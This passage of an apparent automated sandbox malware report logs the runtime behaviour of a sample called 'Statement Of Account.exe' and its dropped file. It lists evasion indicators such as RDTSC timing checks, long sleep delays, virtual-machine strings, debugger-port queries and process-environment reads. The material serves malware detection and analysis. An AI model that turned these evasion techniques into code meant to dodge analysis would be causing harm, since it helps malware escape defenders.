          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe - Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmstp.exe - Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: Yara match - File source: Process Memory Space: SdYCcXyq.exe PID: 7408, type: MEMORYSTR
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - RDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exe - RDTSC instruction interceptor: First address: 27B9904 second address: 27B990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\colorcpl.exe - RDTSC instruction interceptor: First address: 2C49904 second address: 2C4990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exe - RDTSC instruction interceptor: First address: 27B9B7E second address: 27B9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\colorcpl.exe - RDTSC instruction interceptor: First address: 2C49B7E second address: 2C49B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Statement Of Account.exe - Memory allocated: 14A0000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\Statement Of Account.exe - Memory allocated: 3120000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\Statement Of Account.exe - Memory allocated: 1710000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\Statement Of Account.exe - Memory allocated: 7C40000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\Statement Of Account.exe - Memory allocated: 8C40000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\Statement Of Account.exe - Memory allocated: 8DE0000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\Statement Of Account.exe - Memory allocated: 9DE0000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\Statement Of Account.exe - Memory allocated: A310000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\Statement Of Account.exe - Memory allocated: B310000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe - Memory allocated: DA0000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe - Memory allocated: 2AC0000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe - Memory allocated: 4AC0000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe - Memory allocated: 7400000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe - Memory allocated: 6E00000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe - Memory allocated: 8400000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe - Memory allocated: 9400000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe - Memory allocated: 9820000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe - Memory allocated: A820000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe - Memory allocated: B820000 memory reserve | memory write watch
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Code function: 8_2_00F6E0D0 rdtsc 8_2_00F6E0D0
          Source: C:\Users\user\Desktop\Statement Of Account.exe - Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe - Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 8179
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 1059
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 7517
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 1888
          Source: C:\Windows\explorer.exe - Window / User API: threadDelayed 2015
          Source: C:\Windows\explorer.exe - Window / User API: threadDelayed 7921
          Source: C:\Windows\explorer.exe - Window / User API: foregroundWindowGot 877
          Source: C:\Windows\explorer.exe - Window / User API: foregroundWindowGot 862
          Source: C:\Windows\SysWOW64\cmstp.exe - Window / User API: threadDelayed 472
          Source: C:\Windows\SysWOW64\cmstp.exe - Window / User API: threadDelayed 9498
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - API coverage: 0.8 %
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - API coverage: 6.2 %
          Source: C:\Users\user\Desktop\Statement Of Account.exe TID: 6812 - Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1868 - Thread sleep count: 8179 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7304 - Thread sleep time: -7378697629483816s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2504 - Thread sleep count: 1059 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7252 - Thread sleep time: -1844674407370954s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7316 - Thread sleep time: -6456360425798339s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7292 - Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 7960 - Thread sleep count: 2015 > 30
          Source: C:\Windows\explorer.exe TID: 7960 - Thread sleep time: -4030000s >= -30000s
          Source: C:\Windows\explorer.exe TID: 7960 - Thread sleep count: 7921 > 30
          Source: C:\Windows\explorer.exe TID: 7960 - Thread sleep time: -15842000s >= -30000s
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe TID: 7428 - Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\cmstp.exe TID: 7844 - Thread sleep count: 472 > 30
          Source: C:\Windows\SysWOW64\cmstp.exe TID: 7844 - Thread sleep time: -944000s >= -30000s
          Source: C:\Windows\SysWOW64\cmstp.exe TID: 7844 - Thread sleep count: 9498 > 30
          Source: C:\Windows\SysWOW64\cmstp.exe TID: 7844 - Thread sleep time: -18996000s >= -30000s
          Source: C:\Windows\System32\conhost.exe - Last function: Thread delayed
          Source: C:\Windows\SysWOW64\cmstp.exe - Last function: Thread delayed
          Source: C:\Windows\SysWOW64\cmstp.exe - Last function: Thread delayed
          Source: explorer.exe, 00000009.00000000.1723152883.00000000098A8000.00000004.00000001.00020000.00000000.sdmp - Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000009.00000000.1721919184.0000000009815000.00000004.00000001.00020000.00000000.sdmp - Binary or memory string: NECVMWar VMware SATA CD00\w
          Source: explorer.exe, 00000009.00000000.1714988461.00000000078A0000.00000004.00000001.00020000.00000000.sdmp - Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
          Source: explorer.exe, 00000009.00000000.1723152883.00000000098A8000.00000004.00000001.00020000.00000000.sdmp - Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000009.00000002.2937710239.0000000001240000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
          Source: explorer.exe, 00000009.00000002.2942465733.00000000079FB000.00000004.00000001.00020000.00000000.sdmp - Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000009.00000000.1723152883.0000000009977000.00000004.00000001.00020000.00000000.sdmp - Binary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000009.00000002.2942465733.00000000078AD000.00000004.00000001.00020000.00000000.sdmp - Binary or memory string: NXTTAVMWare
          Source: explorer.exe, 00000009.00000000.1721919184.0000000009815000.00000004.00000001.00020000.00000000.sdmp - Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
          Source: explorer.exe, 00000009.00000000.1721919184.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2946201505.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1721919184.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2946201505.000000000982D000.00000004.00000001.00020000.00000000.sdmp - Binary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000009.00000000.1723152883.0000000009977000.00000004.00000001.00020000.00000000.sdmp - Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: explorer.exe, 00000009.00000002.2942465733.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007A34000.00000004.00000001.00020000.00000000.sdmp - Binary or memory string: Hyper-V RAWen-GBnx
          Source: explorer.exe, 00000009.00000002.2946201505.0000000009660000.00000004.00000001.00020000.00000000.sdmp - Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
          Source: explorer.exe, 00000009.00000002.2937710239.0000000001240000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: explorer.exe, 00000009.00000002.2937710239.0000000001240000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\cmstp.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F6E0D0 rdtsc 8_2_00F6E0D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB2AD0 NtReadFile,LdrInitializeThunk,8_2_00FB2AD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F6C0F0 mov eax, dword ptr fs:[00000030h]8_2_00F6C0F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB20F0 mov ecx, dword ptr fs:[00000030h]8_2_00FB20F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101E10E mov eax, dword ptr fs:[00000030h]8_2_0101E10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101E10E mov ecx, dword ptr fs:[00000030h]8_2_0101E10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101E10E mov eax, dword ptr fs:[00000030h]8_2_0101E10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101E10E mov eax, dword ptr fs:[00000030h]8_2_0101E10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101E10E mov ecx, dword ptr fs:[00000030h]8_2_0101E10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101E10E mov eax, dword ptr fs:[00000030h]8_2_0101E10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101E10E mov eax, dword ptr fs:[00000030h]8_2_0101E10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101E10E mov ecx, dword ptr fs:[00000030h]8_2_0101E10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101E10E mov eax, dword ptr fs:[00000030h]8_2_0101E10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101E10E mov ecx, dword ptr fs:[00000030h]8_2_0101E10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F6A0E3 mov ecx, dword ptr fs:[00000030h]8_2_00F6A0E3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01030115 mov eax, dword ptr fs:[00000030h]8_2_01030115
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101A118 mov ecx, dword ptr fs:[00000030h]8_2_0101A118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101A118 mov eax, dword ptr fs:[00000030h]8_2_0101A118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101A118 mov eax, dword ptr fs:[00000030h]8_2_0101A118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101A118 mov eax, dword ptr fs:[00000030h]8_2_0101A118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F780E9 mov eax, dword ptr fs:[00000030h]8_2_00F780E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF60E0 mov eax, dword ptr fs:[00000030h]8_2_00FF60E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF20DE mov eax, dword ptr fs:[00000030h]8_2_00FF20DE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01004144 mov eax, dword ptr fs:[00000030h]8_2_01004144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01004144 mov eax, dword ptr fs:[00000030h]8_2_01004144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01004144 mov ecx, dword ptr fs:[00000030h]8_2_01004144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01004144 mov eax, dword ptr fs:[00000030h]8_2_01004144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01004144 mov eax, dword ptr fs:[00000030h]8_2_01004144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F680A0 mov eax, dword ptr fs:[00000030h]8_2_00F680A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01008158 mov eax, dword ptr fs:[00000030h]8_2_01008158
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01044164 mov eax, dword ptr fs:[00000030h]8_2_01044164
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01044164 mov eax, dword ptr fs:[00000030h]8_2_01044164
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F7208A mov eax, dword ptr fs:[00000030h]8_2_00F7208A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01014180 mov eax, dword ptr fs:[00000030h]8_2_01014180
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01014180 mov eax, dword ptr fs:[00000030h]8_2_01014180
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0102C188 mov eax, dword ptr fs:[00000030h]8_2_0102C188
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0102C188 mov eax, dword ptr fs:[00000030h]8_2_0102C188
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9C073 mov eax, dword ptr fs:[00000030h]8_2_00F9C073
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F72050 mov eax, dword ptr fs:[00000030h]8_2_00F72050
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF6050 mov eax, dword ptr fs:[00000030h]8_2_00FF6050
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010361C3 mov eax, dword ptr fs:[00000030h]8_2_010361C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010361C3 mov eax, dword ptr fs:[00000030h]8_2_010361C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F6A020 mov eax, dword ptr fs:[00000030h]8_2_00F6A020
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F6C020 mov eax, dword ptr fs:[00000030h]8_2_00F6C020
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010461E5 mov eax, dword ptr fs:[00000030h]8_2_010461E5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F8E016 mov eax, dword ptr fs:[00000030h]8_2_00F8E016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F8E016 mov eax, dword ptr fs:[00000030h]8_2_00F8E016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F8E016 mov eax, dword ptr fs:[00000030h]8_2_00F8E016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F8E016 mov eax, dword ptr fs:[00000030h]8_2_00F8E016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF4000 mov ecx, dword ptr fs:[00000030h]8_2_00FF4000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01012000 mov eax, dword ptr fs:[00000030h]8_2_01012000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01012000 mov eax, dword ptr fs:[00000030h]8_2_01012000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01012000 mov eax, dword ptr fs:[00000030h]8_2_01012000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01012000 mov eax, dword ptr fs:[00000030h]8_2_01012000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01012000 mov eax, dword ptr fs:[00000030h]8_2_01012000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01012000 mov eax, dword ptr fs:[00000030h]8_2_01012000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01012000 mov eax, dword ptr fs:[00000030h]8_2_01012000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01012000 mov eax, dword ptr fs:[00000030h]8_2_01012000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA01F8 mov eax, dword ptr fs:[00000030h]8_2_00FA01F8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F861D1 mov eax, dword ptr fs:[00000030h]8_2_00F861D1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F861D1 mov eax, dword ptr fs:[00000030h]8_2_00F861D1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FEE1D0 mov eax, dword ptr fs:[00000030h]8_2_00FEE1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FEE1D0 mov eax, dword ptr fs:[00000030h]8_2_00FEE1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FEE1D0 mov ecx, dword ptr fs:[00000030h]8_2_00FEE1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FEE1D0 mov eax, dword ptr fs:[00000030h]8_2_00FEE1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FEE1D0 mov eax, dword ptr fs:[00000030h]8_2_00FEE1D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01006030 mov eax, dword ptr fs:[00000030h]8_2_01006030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF019F mov eax, dword ptr fs:[00000030h]8_2_00FF019F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF019F mov eax, dword ptr fs:[00000030h]8_2_00FF019F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF019F mov eax, dword ptr fs:[00000030h]8_2_00FF019F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF019F mov eax, dword ptr fs:[00000030h]8_2_00FF019F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F6A197 mov eax, dword ptr fs:[00000030h]8_2_00F6A197
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F6A197 mov eax, dword ptr fs:[00000030h]8_2_00F6A197
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F6A197 mov eax, dword ptr fs:[00000030h]8_2_00F6A197
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB0185 mov eax, dword ptr fs:[00000030h]8_2_00FB0185
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F6C156 mov eax, dword ptr fs:[00000030h]8_2_00F6C156
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F76154 mov eax, dword ptr fs:[00000030h]8_2_00F76154
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F76154 mov eax, dword ptr fs:[00000030h]8_2_00F76154
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010080A8 mov eax, dword ptr fs:[00000030h]8_2_010080A8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F72140 mov ecx, dword ptr fs:[00000030h]8_2_00F72140
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F72140 mov eax, dword ptr fs:[00000030h]8_2_00F72140
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010360B8 mov eax, dword ptr fs:[00000030h]8_2_010360B8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010360B8 mov ecx, dword ptr fs:[00000030h]8_2_010360B8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA0124 mov eax, dword ptr fs:[00000030h]8_2_00FA0124
